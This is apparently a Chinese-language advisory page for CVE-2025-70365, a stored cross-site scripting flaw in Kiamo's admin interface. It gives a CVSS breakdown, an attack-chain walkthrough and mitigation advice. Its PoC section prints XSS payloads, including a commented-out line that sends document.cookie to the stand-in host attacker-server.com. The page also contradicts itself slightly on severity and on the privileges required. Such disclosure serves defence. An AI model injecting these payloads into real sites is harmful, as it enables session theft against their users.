CVE-2025-70365 CVSS 5.4 中危

CVE-2025-70365 Kiamo存储型XSS漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-70365

漏洞类型

存储型跨站脚本攻击

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Kiamo

漏洞概述

Kiamo 8.4之前的版本中存在一个严重的存储型跨站脚本（XSS）漏洞。该问题的根源在于管理界面未能对用户提供的输入进行适当的输出编码。攻击者利用此漏洞，只需经过身份验证的管理员权限，即可向系统注入恶意的JavaScript代码。当其他用户访问包含该恶意代码的受影响页面时，脚本将在其浏览器上下文中自动执行。值得注意的是，供应商声称在CVE记录正式发布之前，针对8.3.1分支的修复补丁已经发布，但该漏洞仍对未及时更新的系统构成安全威胁。

技术细节

该漏洞属于典型的存储型XSS（Stored XSS），其技术原理在于应用程序对持久化数据的处理存在缺陷。在Kiamo受影响版本的管理后台中，特定表单字段（如系统配置或用户管理模块）在接收用户输入时，未实施严格的输入过滤和输出转义机制。攻击者可以将精心构造的JavaScript载荷（例如 `<script>alert(1)</script>`）提交至服务器并存储在数据库中。由于CVSS向量显示 `PR:L`（低权限）和 `UI:R`（需用户交互），攻击者通常需要某种形式的访问权限来注入载荷，但受害者只需浏览受影响页面即可触发漏洞。恶意脚本执行后，攻击者可利用浏览器的会话上下文窃取Cookie、执行未授权操作或进行钓鱼攻击。

攻击链分析

STEP 1

步骤1：身份验证

攻击者获取Kiamo管理后台的访问凭证，以低权限或管理员身份登录系统。

STEP 2

步骤2：注入载荷

攻击者在管理界面的易受攻击字段（如配置项或描述框）中输入恶意的JavaScript代码。

STEP 3

步骤3：存储数据

应用程序将恶意数据未经净化地存储在后端数据库中。

STEP 4

步骤4：触发漏洞

受害者（如其他管理员或用户）访问包含该恶意数据的页面。

STEP 5

步骤5：代码执行

受害者的浏览器解析页面并执行攻击者注入的脚本，导致会话劫持或其他恶意行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2025-70365 -->
<!-- Target: Kiamo Administrative Interface Input Field -->

<script>
  // Basic payload to confirm vulnerability
  alert('CVE-2025-70365 XSS Triggered');
  
  // Advanced payload to steal session cookies
  // var img = new Image();
  // img.src = "http://attacker-server.com/steal?c=" + document.cookie;
  // document.body.appendChild(img);
</script>

<!-- Alternative payload using onerror event -->
<img src=x onerror=alert('XSS')>

影响范围

Kiamo < 8.4

防御指南

临时缓解措施

在无法立即升级补丁的情况下，建议通过防火墙严格限制管理后台的访问IP列表，仅允许受信任的管理员设备连接。同时，应对所有管理用户的输入进行人工审查，并启用Web应用防火墙（WAF）规则以检测和阻断潜在的XSS攻击流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表